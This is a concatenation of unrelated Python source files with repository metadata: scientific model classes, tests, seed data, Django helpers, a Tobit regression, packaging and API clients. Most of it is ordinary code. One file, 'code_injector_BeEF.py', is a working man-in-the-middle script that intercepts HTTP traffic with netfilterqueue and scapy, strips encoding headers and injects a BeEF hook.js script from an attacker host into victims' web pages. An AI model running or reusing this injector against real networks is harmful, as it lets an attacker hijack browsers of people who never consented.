| 14 | 2021-02-23T11:53:08.000Z | 2021-11-16T10:45:31.000Z | src/pvt_model/pvt_system/pipe.py | BenWinchester/PVTModel | 6bf3976b06f406f632e0a9e525cd8b05359da239 | [
"MIT"
]
| null | null | null | #!/usr/bin/python3.7
########################################################################################
# pvt_collector/pipe.py - Represents a pipe within the system.
#
# Author: Ben Winchester
# Copyright: Ben Winchester, 2021
########################################################################################
"""
The pipe module for the PV-T model.
This module represents a pipe within the PV-T system.
"""
from dataclasses import dataclass
__all__ = ("Pipe",)
@dataclass
class Pipe:
"""
Represents a pipe within the PVT system.
.. attribute:: temperature
The temperature of the pipe, measured in Kelvin.
"""
temperature: float
| 21.25 | 88 | 0.507353 | 186 | 0.273529 | 0 | 0 | 197 | 0.289706 | 0 | 0 | 567 | 0.833824 |
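# --- Illustrative usage sketch (not part of the original file; added for
# clarity):
#
# pipe = Pipe(temperature=293.15)   # 20 degrees Celsius, expressed in Kelvin
# pipe.temperature += 5             # plain dataclass attribute access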
c7b0b81ceafaed0e74acb2a5f98af6b65a8f276d | 1,850 | py | Python | tests/test_api_account_state.py | luisparravicini/ioapi | f9d60a28032fd54163ea15b8256aba1d48ec4dcc | [
"MIT"
]
| null | null | null | tests/test_api_account_state.py | luisparravicini/ioapi | f9d60a28032fd54163ea15b8256aba1d48ec4dcc | [
"MIT"
]
| null | null | null | tests/test_api_account_state.py | luisparravicini/ioapi | f9d60a28032fd54163ea15b8256aba1d48ec4dcc | [
"MIT"
]
| 1 | 2020-05-03T04:34:32.000Z | 2020-05-03T04:34:32.000Z | import unittest
import os
import json
import requests
import requests_mock
from ioapi import api_url, IOService, AuthorizationError, UnexpectedResponseCodeError
class APIAccountStateTestCase(unittest.TestCase):
def setUp(self):
self.service = IOService()
@requests_mock.mock()
def test_account_state_without_auth(self, mock):
data = self._read_mock_response('account_state_without_auth')
self._setup_response(mock, data, 401)
with self.assertRaises(AuthorizationError):
self.service.get_account_state()
@requests_mock.mock()
def test_account_state_auth_not_ok(self, mock):
data = self._read_mock_response('account_state_not_ok')
for code in range(201, 600):
# skip 401 status code (unauthorized)
if code == 401:
continue
self._setup_response(mock, data, code)
with self.assertRaises(UnexpectedResponseCodeError) as cm:
self.service.get_account_state()
self.assertEqual(cm.exception.status_code, code)
@requests_mock.mock()
def test_account_state(self, mock):
data = self._read_mock_response('account_state')
self.service = IOService()
self._setup_response(mock, data)
self.assertEqual(self.service.get_account_state(), data)
self.fail("auth missing")
def _read_mock_response(self, name):
path = os.path.join(os.path.dirname(__file__), name + '.json')
with open(path, 'r') as file:
data = json.loads(file.read())
return data
def _setup_response(self, mock, response, code=None):
if code is None:
code = requests.codes.ok
mock.get(
self.service.api + api_url.URL_ACCOUNT_STATE,
json=response,
status_code=code)
| 31.355932 | 85 | 0.656216 | 1,686 | 0.911351 | 0 | 0 | 1,094 | 0.591351 | 0 | 0 | 126 | 0.068108 |
c7b0f4e12943a98dbd413a45f48a80cdcaf7bcf6 | 6,517 | py | Python | testData/devSeedData.py | bgporter/wastebook | 79885a8d503452e1fbeb8ff445cedd2daafff2a0 | [
"MIT"
]
| null | null | null | testData/devSeedData.py | bgporter/wastebook | 79885a8d503452e1fbeb8ff445cedd2daafff2a0 | [
"MIT"
]
| null | null | null | testData/devSeedData.py | bgporter/wastebook | 79885a8d503452e1fbeb8ff445cedd2daafff2a0 | [
"MIT"
]
| null | null | null | '''
fake posts to bootstrap a development database. Put any interesting cases
useful for development in here.
'''
from datetime import datetime
POST_DATA_1 = [
{
"created" : datetime(2015, 10, 1),
"published": datetime(2015, 10, 1),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "First Post",
"slug": "",
"text": "a bunch of words #foo #bar",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 10, 2),
"published": datetime(2015, 10, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": False,
"status": "published",
"title": "Second Post",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 10, 2),
"published": datetime(2015, 10, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": False,
"status": "draft",
"title": "Third Post",
"slug": "",
"text": "This is a #draft #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 10, 2),
"published": datetime(2015, 10, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "draft",
"title": "Fourth Post",
"slug": "",
"text": "This is a #draft #post",
"tags": [],
"type": "Post"
},
]
POST_DATA_2 = [
{
"created" : datetime(2015, 3, 2),
"published": datetime(2015, 3, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "Post 1",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 4, 2),
"published": datetime(2015, 4, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "Post 2",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 5, 2),
"published": datetime(2015, 5, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "Post 3",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 5, 2),
"published": datetime(2015, 5, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "Post 4",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 6, 2),
"published": datetime(2015, 6, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "Post 5",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 6, 2),
"published": datetime(2015, 6, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "Post 6",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 6, 2),
"published": datetime(2015, 6, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "Post 7",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 7, 2),
"published": datetime(2015, 7, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "Post 8",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 8, 2),
"published": datetime(2015, 8, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "Post 9",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 9, 2),
"published": datetime(2015, 9, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "Post 10",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 10, 2),
"published": datetime(2015, 10, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "Post 11",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
] | 29.224215 | 77 | 0.399724 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,459 | 0.377321 |
c7b11734daef5c05aa9cf025632e59324996f20e | 2,954 | py | Python | customer_support/utils.py | rtnpro/django-customer-support | 6de8d9301fe01a42fa6799757a107be69ee82426 | [
"MIT"
]
| 1 | 2017-05-06T04:49:45.000Z | 2017-05-06T04:49:45.000Z | customer_support/utils.py | rtnpro/django-customer-support | 6de8d9301fe01a42fa6799757a107be69ee82426 | [
"MIT"
]
| null | null | null | customer_support/utils.py | rtnpro/django-customer-support | 6de8d9301fe01a42fa6799757a107be69ee82426 | [
"MIT"
]
| null | null | null | from __future__ import absolute_import
from django.shortcuts import render
import simplejson
import datetime
from django.http import HttpResponse
class GenericItemBase(object):
ITEM_ATTRS = []
def __init__(self, identifier):
self.identifier = identifier
def jsonify(self, value):
"""
Method to convert non JSON serializable objects into
an equivalent JSON serializable form.
"""
return value
def json(self):
raise NotImplementedError
def render_json(self):
raise NotImplementedError
def render_html(self):
raise NotImplementedError
class GenericItem(GenericItemBase):
TEMPLATE = 'customer_support/item.html'
def __init__(self, *args, **kwargs):
super(GenericItem, self).__init__(*args, **kwargs)
self._item = {}
def get_item(self, identifier):
raise NotImplementedError
def set_item(self, data):
self._item = {}
for key, value in data.items():
if key in self.ITEM_ATTRS:
self._item[key] = value
def json(self):
item = {}
for attr_name in self.ITEM_ATTRS:
attr = self.jsonify(self._item[attr_name])
            if isinstance(attr, datetime.datetime):  # `datetime` alone is the module
attr = attr.strftime('%Y-%m-%d %H:%M')
item[attr_name] = attr
return simplejson.dumps(item)
def render_json(self):
return HttpResponse(
self.json(), mimetype='application/json')
def render_html(self):
return render(self.TEMPLATE, {'item': self._item})
class GenericItems(GenericItemBase):
TEMPLATE = 'customer_support/items.html'
def __init__(self, *args, **kwargs):
        super(GenericItems, self).__init__(*args, **kwargs)
self._items = []
def get_items(self, for_entity):
raise NotImplementedError
def set_items(self, items):
self._items = items
def json(self):
items = []
for item in self._items:
item_dict = {}
for attr_name in self.ITEM_ATTRS:
attr = self.jsonify(item[attr_name])
                if isinstance(attr, datetime.datetime):  # `datetime` alone is the module
attr = attr.strftime('%Y-%m-%d %H:%M')
item_dict[attr_name] = attr
            items.append(item_dict)
return simplejson.dumps(items)
def render_json(self):
return HttpResponse(
self.json(), mimetype='application/json')
def render_html(self):
return render(self.TEMPLATE, {'items': self._items})
class GenericActions(object):
def __init__(self, item_id):
self.item_id = item_id
self.actions = []
def get_actions_for_item(self):
raise NotImplementedError
def json(self):
return simplejson.dumps(self.actions)
def render_json(self):
return HttpResponse(self.json(), mimetype='application/json')
def render_html(self):
pass
| 25.912281 | 69 | 0.613067 | 2,796 | 0.946513 | 0 | 0 | 0 | 0 | 0 | 0 | 278 | 0.09411 |
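# --- Illustrative subclass sketch (not part of the original file; added for
# clarity). The classes above are abstract: a concrete item defines ITEM_ATTRS
# and implements get_item(). The Ticket model below is invented.
#
# class TicketItem(GenericItem):
#     ITEM_ATTRS = ['title', 'created']
#
#     def get_item(self, identifier):
#         ticket = Ticket.objects.get(pk=identifier)  # hypothetical model
#         self.set_item({'title': ticket.title, 'created': ticket.created})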
c7b4d983814129255c3038e65a92199d05319e32 | 6,061 | py | Python | tobit.py | AlvaroCorrales/tobit | 6993b1cfe58010cd59aac477ced3c2525342244f | [
"MIT"
]
| 1 | 2021-04-13T03:14:01.000Z | 2021-04-13T03:14:01.000Z | tobit.py | AlvaroCorrales/tobit | 6993b1cfe58010cd59aac477ced3c2525342244f | [
"MIT"
]
| null | null | null | tobit.py | AlvaroCorrales/tobit | 6993b1cfe58010cd59aac477ced3c2525342244f | [
"MIT"
]
| null | null | null | import math
import warnings
import numpy as np
import pandas as pd
from scipy.optimize import minimize
import scipy.stats
from scipy.stats import norm # edit
from scipy.special import log_ndtr
from sklearn.linear_model import LinearRegression
from sklearn.metrics import mean_squared_error, mean_absolute_error
def split_left_right_censored(x, y, cens):
counts = cens.value_counts()
if -1 not in counts and 1 not in counts:
warnings.warn("No censored observations; use regression methods for uncensored data")
xs = []
ys = []
for value in [-1, 0, 1]:
if value in counts:
split = cens == value
y_split = np.squeeze(y[split].values)
x_split = x[split].values
else:
y_split, x_split = None, None
xs.append(x_split)
ys.append(y_split)
return xs, ys
def tobit_neg_log_likelihood(xs, ys, params):
x_left, x_mid, x_right = xs
y_left, y_mid, y_right = ys
b = params[:-1]
# s = math.exp(params[-1])
s = params[-1]
to_cat = []
cens = False
if y_left is not None:
cens = True
left = (y_left - np.dot(x_left, b))
to_cat.append(left)
if y_right is not None:
cens = True
right = (np.dot(x_right, b) - y_right)
to_cat.append(right)
if cens:
concat_stats = np.concatenate(to_cat, axis=0) / s
log_cum_norm = scipy.stats.norm.logcdf(concat_stats) # log_ndtr(concat_stats)
cens_sum = log_cum_norm.sum()
else:
cens_sum = 0
if y_mid is not None:
mid_stats = (y_mid - np.dot(x_mid, b)) / s
mid = scipy.stats.norm.logpdf(mid_stats) - math.log(max(np.finfo('float').resolution, s))
mid_sum = mid.sum()
else:
mid_sum = 0
loglik = cens_sum + mid_sum
return - loglik
def tobit_neg_log_likelihood_der(xs, ys, params):
x_left, x_mid, x_right = xs
y_left, y_mid, y_right = ys
b = params[:-1]
# s = math.exp(params[-1]) # in censReg, not using chain rule as below; they optimize in terms of log(s)
s = params[-1]
beta_jac = np.zeros(len(b))
sigma_jac = 0
if y_left is not None:
left_stats = (y_left - np.dot(x_left, b)) / s
l_pdf = scipy.stats.norm.logpdf(left_stats)
l_cdf = log_ndtr(left_stats)
left_frac = np.exp(l_pdf - l_cdf)
beta_left = np.dot(left_frac, x_left / s)
beta_jac -= beta_left
left_sigma = np.dot(left_frac, left_stats)
sigma_jac -= left_sigma
if y_right is not None:
right_stats = (np.dot(x_right, b) - y_right) / s
r_pdf = scipy.stats.norm.logpdf(right_stats)
r_cdf = log_ndtr(right_stats)
right_frac = np.exp(r_pdf - r_cdf)
beta_right = np.dot(right_frac, x_right / s)
beta_jac += beta_right
right_sigma = np.dot(right_frac, right_stats)
sigma_jac -= right_sigma
if y_mid is not None:
mid_stats = (y_mid - np.dot(x_mid, b)) / s
beta_mid = np.dot(mid_stats, x_mid / s)
beta_jac += beta_mid
mid_sigma = (np.square(mid_stats) - 1).sum()
sigma_jac += mid_sigma
combo_jac = np.append(beta_jac, sigma_jac / s) # by chain rule, since the expression above is dloglik/dlogsigma
return -combo_jac
class TobitModel:
def __init__(self, fit_intercept=True):
self.fit_intercept = fit_intercept
self.ols_coef_ = None
self.ols_intercept = None
self.coef_ = None
self.intercept_ = None
self.sigma_ = None
def fit(self, x, y, cens, verbose=False):
"""
Fit a maximum-likelihood Tobit regression
:param x: Pandas DataFrame (n_samples, n_features): Data
:param y: Pandas Series (n_samples,): Target
:param cens: Pandas Series (n_samples,): -1 indicates left-censored samples, 0 for uncensored, 1 for right-censored
:param verbose: boolean, show info from minimization
:return:
"""
x_copy = x.copy()
if self.fit_intercept:
x_copy.insert(0, 'intercept', 1.0)
else:
            # pandas DataFrames have no .scale(); demean in place instead,
            # matching the original intent (with_mean=True, with_std=False)
            x_copy = x_copy - x_copy.mean()
init_reg = LinearRegression(fit_intercept=False).fit(x_copy, y)
b0 = init_reg.coef_
y_pred = init_reg.predict(x_copy)
resid = y - y_pred
resid_var = np.var(resid)
s0 = np.sqrt(resid_var)
params0 = np.append(b0, s0)
xs, ys = split_left_right_censored(x_copy, y, cens)
result = minimize(lambda params: tobit_neg_log_likelihood(xs, ys, params), params0, method='BFGS',
jac=lambda params: tobit_neg_log_likelihood_der(xs, ys, params), options={'disp': verbose})
if verbose:
print(result)
self.ols_coef_ = b0[1:]
self.ols_intercept = b0[0]
if self.fit_intercept:
            self.intercept_ = result.x[0]  # index 0 is the intercept column inserted above
self.coef_ = result.x[1:-1]
else:
self.coef_ = result.x[:-1]
self.intercept_ = 0
self.sigma_ = result.x[-1]
return self
def predict(self, x):
return self.intercept_ + np.dot(x, self.coef_)
def score(self, x, y, scoring_function=mean_absolute_error):
        y_pred = self.predict(x)  # include the intercept, consistent with predict()
return scoring_function(y, y_pred)
# EDIT - insert marginal effects function
def margins(self, x, k = 0):
"""
Marginal effects on dependent variable of a regressor, identified by coef
:param x: array with all regressors (independent variables) to make a prediction
:param k: coefficient corresponding to the regressor with respect to which we want to take the marginal effects
:return: an array with the marginal effects estimated at each observation's level
The marginal effect of regressor k on individual i's y is defined as the product of coef[k] and the normal cdf
evaluated at x_i * coeff[k] / sigma
"""
return self.coef_[k] * norm.cdf(self.predict(x) / self.sigma_) | 33.120219 | 123 | 0.620855 | 2,755 | 0.454545 | 0 | 0 | 0 | 0 | 0 | 0 | 1,311 | 0.216301 |
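# --- Illustrative usage sketch (not part of the original file; added for
# clarity). Synthetic left-censored data: y* = 1 + 2x + e, observed as
# y = max(y*, 0), with cens = -1 where the zero floor binds and 0 otherwise.
#
# rng = np.random.RandomState(0)
# x = pd.DataFrame({'x': rng.normal(size=500)})
# y_star = 1 + 2 * x['x'] + rng.normal(scale=1.0, size=500)
# y = y_star.clip(lower=0)
# cens = pd.Series(np.where(y_star < 0, -1, 0))
# model = TobitModel().fit(x, y, cens)
# print(model.intercept_, model.coef_, model.sigma_)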
c7b509b05f7f3079575b9250d0a2891a9795c878 | 1,554 | py | Python | setup.py | Raymond38324/hagworm | 196d4735719f586d52a1cd9f21aedd00e16b59b0 | [
"Apache-2.0"
]
| null | null | null | setup.py | Raymond38324/hagworm | 196d4735719f586d52a1cd9f21aedd00e16b59b0 | [
"Apache-2.0"
]
| null | null | null | setup.py | Raymond38324/hagworm | 196d4735719f586d52a1cd9f21aedd00e16b59b0 | [
"Apache-2.0"
]
| null | null | null | # -*- coding: utf-8 -*-
import setuptools
with open(r'README.md', r'r', encoding="utf8") as stream:
long_description = stream.read()
setuptools.setup(
name=r'hagworm',
version=r'3.0.0',
license=r'Apache License Version 2.0',
platforms=[r'all'],
author=r'Shaobo.Wang',
author_email=r'[email protected]',
description=r'Network Development Suite',
long_description=long_description,
long_description_content_type=r'text/markdown',
url=r'https://github.com/wsb310/hagworm',
packages=setuptools.find_packages(),
package_data={r'hagworm': [r'static/*.*']},
python_requires=r'>= 3.7',
install_requires=[
r'aioftp==0.13.0',
r'aiohttp==3.5.4',
r'aiokafka==0.5.2',
r'aiomysql==0.0.20',
r'aioredis==1.2.0',
r'cacheout==0.11.1',
r'crontab==0.22.6',
r'cryptography==2.7.0',
r'hiredis==1.0.0',
r'Jinja2==2.10.1',
r'tornado-jinja2==0.2.4',
r'loguru==0.3.0',
r'motor==2.0.0',
r'mq_http_sdk==1.0.1',
r'objgraph==3.4.1',
r'Pillow==6.1.0',
r'psutil==5.6.3',
r'PyJWT==1.7.1',
r'pytest==5.0.1',
r'pytest-asyncio==0.10.0',
r'Sphinx==2.1.2',
r'SQLAlchemy==1.3.5',
r'tornado==6.0.3',
r'xlwt==1.3.0',
r'xmltodict==0.12.0',
],
classifiers=[
r'Programming Language :: Python :: 3.7',
r'License :: OSI Approved :: Apache Software License',
r'Operating System :: POSIX :: Linux',
],
)
| 28.254545 | 62 | 0.548263 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 824 | 0.530245 |
c7b513ddbd33e479f8df70d1c5b9306a2ec0133a | 3,072 | py | Python | mercury_ml/keras/containers.py | gabrieloexle/mercury-ml | cc663f84a26ee66ae105bbfc0cd1cbd5629031cd | [
"MIT"
]
| null | null | null | mercury_ml/keras/containers.py | gabrieloexle/mercury-ml | cc663f84a26ee66ae105bbfc0cd1cbd5629031cd | [
"MIT"
]
| null | null | null | mercury_ml/keras/containers.py | gabrieloexle/mercury-ml | cc663f84a26ee66ae105bbfc0cd1cbd5629031cd | [
"MIT"
]
| null | null | null | """
Simple IoC containers that provide direct access to various Keras providers
"""
class ModelSavers:
from mercury_ml.keras.providers import model_saving
save_hdf5 = model_saving.save_keras_hdf5
save_tensorflow_graph = model_saving.save_tensorflow_graph
save_tensorrt_pbtxt_config = model_saving.save_tensorrt_pbtxt_config
save_tensorrt_json_config = model_saving.save_tensorrt_json_config
save_labels_txt = model_saving.save_labels_txt
save_tensorflow_serving_predict_signature_def = model_saving.save_tensorflow_serving_predict_signature_def
class ModelLoaders:
from mercury_ml.keras.providers import model_loading
load_hdf5 = model_loading.load_hdf5_model
class LossFunctionFetchers:
from mercury_ml.keras.providers import loss_function_fetching
get_keras_loss = loss_function_fetching.get_keras_loss
get_custom_loss = loss_function_fetching.get_custom_loss
class OptimizerFetchers:
from mercury_ml.keras.providers import optimizer_fetching
get_keras_optimizer = optimizer_fetching.get_keras_optimizer
class ModelCompilers:
from mercury_ml.keras.providers import model_compilation
compile_model = model_compilation.compile_model
class ModelFitters:
from mercury_ml.keras.providers import model_fitting
fit = model_fitting.fit
fit_generator = model_fitting.fit_generator
class ModelDefinitions:
from mercury_ml.keras.providers.model_definition import conv_simple, mlp_simple
# these are just two small example model definitions. Users should define their own models
# to use as follows:
# >>> ModelDefinitions.my_model = my_model_module.define_model
define_conv_simple = conv_simple.define_model
define_mlp_simple = mlp_simple.define_model
class GeneratorPreprocessingFunctionGetters:
from mercury_ml.keras.providers.generator_preprocessors import get_random_eraser
get_random_eraser = get_random_eraser
class CallBacks:
from mercury_ml.keras.providers.model_callbacks import TensorBoardProvider, \
BaseLoggerProvider, EarlyStoppingProvider, ModelCheckpointProvider, TerminateOnNaNProvider, \
ProgbarLoggerProvider, RemoteMonitorProvider, LearningRateSchedulerProvider, ReduceLROnPlateauProvider, \
CSVLoggerProvider
tensorboard = TensorBoardProvider
base_logger = BaseLoggerProvider
terminate_on_nan = TerminateOnNaNProvider
progbar_logger = ProgbarLoggerProvider
model_checkpoint = ModelCheckpointProvider
early_stopping = EarlyStoppingProvider
remote_monitor = RemoteMonitorProvider
learning_rate_scheduler = LearningRateSchedulerProvider
reduce_lr_on_plateau = ReduceLROnPlateauProvider
csv_logger = CSVLoggerProvider
class ModelEvaluators:
from mercury_ml.keras.providers import model_evaluation
evaluate = model_evaluation.evaluate
evaluate_generator = model_evaluation.evaluate_generator
class PredictionFunctions:
from mercury_ml.keras.providers import prediction
predict = prediction.predict
predict_generator = prediction.predict_generator
| 38.4 | 113 | 0.823893 | 2,962 | 0.964193 | 0 | 0 | 0 | 0 | 0 | 0 | 255 | 0.083008 |
c7b60df7ecb95aad435c61ec7e818259064a9562 | 1,851 | py | Python | Code Injector/code_injector_BeEF.py | crake7/Defensor-Fortis- | 086b055a10b9ac55f444e8d13b4031f998415438 | [
"MIT"
]
| null | null | null | Code Injector/code_injector_BeEF.py | crake7/Defensor-Fortis- | 086b055a10b9ac55f444e8d13b4031f998415438 | [
"MIT"
]
| null | null | null | Code Injector/code_injector_BeEF.py | crake7/Defensor-Fortis- | 086b055a10b9ac55f444e8d13b4031f998415438 | [
"MIT"
]
| 1 | 2021-12-20T11:44:51.000Z | 2021-12-20T11:44:51.000Z | #!/usr/bin/env python
import netfilterqueue
import scapy.all as scapy
import re

# Port to inspect: 80 for plain HTTP, or 10000 when HTTPS traffic has been
# downgraded/redirected there (the two options from the original placeholders).
HTTP_PORT = 80
def set_load(packet, load):
packet[scapy.Raw].load = load
del packet[scapy.IP].len
del packet[scapy.IP].chksum
del packet[scapy.TCP].chksum
return packet
def process_packet(packet):
"""Modify downloads files on the fly while target uses HTTP/HTTPS.
Do not forget to choose the port you will use on line 23 and 28 and uncomment them."""
scapy_packet = scapy.IP (packet.get_payload())
if scapy_packet.haslayer(scapy.Raw):
#try:
#.decode() in load
            load = scapy_packet[scapy.Raw].load
            if scapy_packet[scapy.TCP].dport == HTTP_PORT:
print("HTTPS Request")
# print(scapy_packet.show())
load = re.sub("Accept-Encoding:.*?\\r\\n", "", load)
            elif scapy_packet[scapy.TCP].sport == HTTP_PORT:
print("HTTPS Response")
#print(scapy_packet.show())
injection_code = '<script src="http://10.0.2.15:3000/hook.js"></script>'
load = load.replace("</body>", injection_code + "</body>")
content_length_search = re.search("(?:Content-Length:\s)(\d*)", load)
if content_length_search and "text/html" in load:
content_length = content_length_search.group(1)
new_content_length = int(content_length) + len(injection_code)
load = load.replace(content_length, str(new_content_length))
if load != scapy_packet[scapy.Raw].load:
new_packet = set_load(scapy_packet, load)
packet.set_payload(str(new_packet))
#except UnicodeDecodeError:
# pass
packet.accept()
queue = netfilterqueue.NetfilterQueue()
queue.bind(0, process_packet)
queue.run()
| 37.02 | 90 | 0.622366 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 523 | 0.28255 |
c7b66acfc0f1fc9f0407ccd4877bc57ccf79afa1 | 4,691 | py | Python | pycardcast/net/aiohttp.py | Elizafox/pycardcast | 36fb8009f32f733fd18a7f3263a61362fdb75ec3 | [
"WTFPL"
]
| null | null | null | pycardcast/net/aiohttp.py | Elizafox/pycardcast | 36fb8009f32f733fd18a7f3263a61362fdb75ec3 | [
"WTFPL"
]
| null | null | null | pycardcast/net/aiohttp.py | Elizafox/pycardcast | 36fb8009f32f733fd18a7f3263a61362fdb75ec3 | [
"WTFPL"
]
| 1 | 2020-04-09T10:12:46.000Z | 2020-04-09T10:12:46.000Z | # Copyright © 2015 Elizabeth Myers.
# All rights reserved.
# This file is part of the pycardcast project. See LICENSE in the root
# directory for licensing information.
import asyncio
import aiohttp
from pycardcast.net import CardcastAPIBase
# `Deck` is needed by the deck() coroutine below.
from pycardcast.deck import (Deck, DeckInfo, DeckInfoNotFoundError,
                             DeckInfoRetrievalError)
from pycardcast.card import (BlackCard, WhiteCard, CardNotFoundError,
CardRetrievalError)
from pycardcast.search import (SearchReturn, SearchNotFoundError,
SearchRetrievalError)
class CardcastAPI(CardcastAPIBase):
"""A :py:class:`~pycardcast.net.CardcastAPIBase` implementation using the
aiohttp library.
All the methods here are coroutines except for one:
:py:meth:`~pycardcast.net.aiohttp.CardcastAPI.search_iter`.
"""
@asyncio.coroutine
def deck_info(self, code):
        req = yield from aiohttp.request("get", self.deck_info_url.format(
            code=code))
        if req.status == 200:
            json = yield from req.json()
            return DeckInfo.from_json(json)
        elif req.status == 404:
            err = "Deck not found: {}".format(code)
            raise DeckInfoNotFoundError(err)
        else:
            err = "Error retrieving deck: {} (code {})".format(code,
                                                               req.status)
            raise DeckInfoRetrievalError(err)
@asyncio.coroutine
def white_cards(self, code):
        req = yield from aiohttp.request("get", self.card_list_url.format(
            code=code))
        if req.status == 200:
            json = yield from req.json()
            return WhiteCard.from_json(json)
        elif req.status == 404:
            err = "White cards not found: {}".format(code)
            raise CardNotFoundError(err)
        else:
            err = "Error retrieving white cards: {} (code {})".format(
                code, req.status)
raise CardRetrievalError(err)
@asyncio.coroutine
def black_cards(self, code):
        req = yield from aiohttp.request("get", self.card_list_url.format(
code=code))
if req.status == 200:
json = yield from req.json()
return BlackCard.from_json(json)
elif req.status == 404:
err = "Black cards not found: {}".format(code)
raise CardNotFoundError(err)
else:
err = "Error retrieving black cards: {} (code {})".format(
code, req.status)
raise CardRetrievalError(err)
@asyncio.coroutine
def cards(self, code):
        req = yield from aiohttp.request("get", self.card_list_url.format(
code=code))
if req.status == 200:
json = yield from req.json()
return (BlackCard.from_json(json), WhiteCard.from_json(json))
elif req.status == 404:
err = "Cards not found: {}".format(code)
raise CardNotFoundError(err)
else:
err = "Error retrieving cards: {} (code {})".format(code,
req.status)
raise CardRetrievalError(err)
@asyncio.coroutine
def deck(self, code):
deckinfo = yield from self.deck_info(code)
cards = yield from self.cards(code)
return Deck(deckinfo, cards[0], cards[1])
@asyncio.coroutine
def search(self, name=None, author=None, category=None, offset=0,
limit=None):
qs = {
"search": name,
"author": author,
"category": category,
"offset": offset,
"limit": (deck_list_max if limit is None else limit)
}
        req = yield from aiohttp.request("get", self.deck_list_url, params=qs)
if req.status == 200:
json = yield from req.json()
return SearchReturn.from_json(json)
elif req.status == 404:
err = "Search query returned not found"
raise SearchNotFoundError(err)
else:
err = "Error searching decks (code {})".format(req.status)
raise SearchRetrievalError(err)
    def search_iter(self, name=None, author=None, category=None, offset=0,
                    limit=None):
        # asyncio has no module-level run_until_complete; drive the search
        # coroutine through the event loop instead.
        loop = asyncio.get_event_loop()
        s = loop.run_until_complete(self.search(name, author, category,
                                                offset, limit))
        while s.count > 0:
            yield s
            offset += s.count
            s = loop.run_until_complete(self.search(name, author, category,
                                                    offset, limit))
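# --- Usage sketch (not part of the original module): the deck code below is
# a placeholder, and CardcastAPIBase is assumed to need no constructor
# arguments, so the calls are left commented rather than executable.
#
#   import asyncio
#   api = CardcastAPI()
#   loop = asyncio.get_event_loop()
#   deck = loop.run_until_complete(api.deck("CAHBS"))
#   print(deck)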
| 37.830645 | 78 | 0.563206 | 4,091 | 0.87191 | 3,648 | 0.777494 | 3,312 | 0.705882 | 0 | 0 | 779 | 0.166027 |
c7b71c7227264e168736696fa5f4ef910e4d9c22 | 2,345 | py | Python | libtiepie/triggeroutput.py | TiePie/python-libtiepie | d2a9875855298a58d6a16be5b61aaa89a558e7d8 | [
"MIT"
]
| 6 | 2020-01-04T02:00:35.000Z | 2022-03-22T00:32:26.000Z | libtiepie/triggeroutput.py | TiePie/python-libtiepie | d2a9875855298a58d6a16be5b61aaa89a558e7d8 | [
"MIT"
]
| 3 | 2020-08-05T15:16:29.000Z | 2022-03-21T07:00:27.000Z | libtiepie/triggeroutput.py | TiePie/python-libtiepie | d2a9875855298a58d6a16be5b61aaa89a558e7d8 | [
"MIT"
]
| null | null | null | from ctypes import *
from .api import api
from .const import *
from .library import library
class TriggerOutput(object):
""""""
def __init__(self, handle, index):
self._handle = handle
self._index = index
def _get_enabled(self):
""" Check whether a trigger output is enabled. """
value = api.DevTrOutGetEnabled(self._handle, self._index)
library.check_last_status_raise_on_error()
return value != BOOL8_FALSE
def _set_enabled(self, value):
value = BOOL8_TRUE if value else BOOL8_FALSE
api.DevTrOutSetEnabled(self._handle, self._index, value)
library.check_last_status_raise_on_error()
def _get_events(self):
""" Supported trigger output events. """
value = api.DevTrOutGetEvents(self._handle, self._index)
library.check_last_status_raise_on_error()
return value
def _get_event(self):
""" Currently selected trigger output event. """
value = api.DevTrOutGetEvent(self._handle, self._index)
library.check_last_status_raise_on_error()
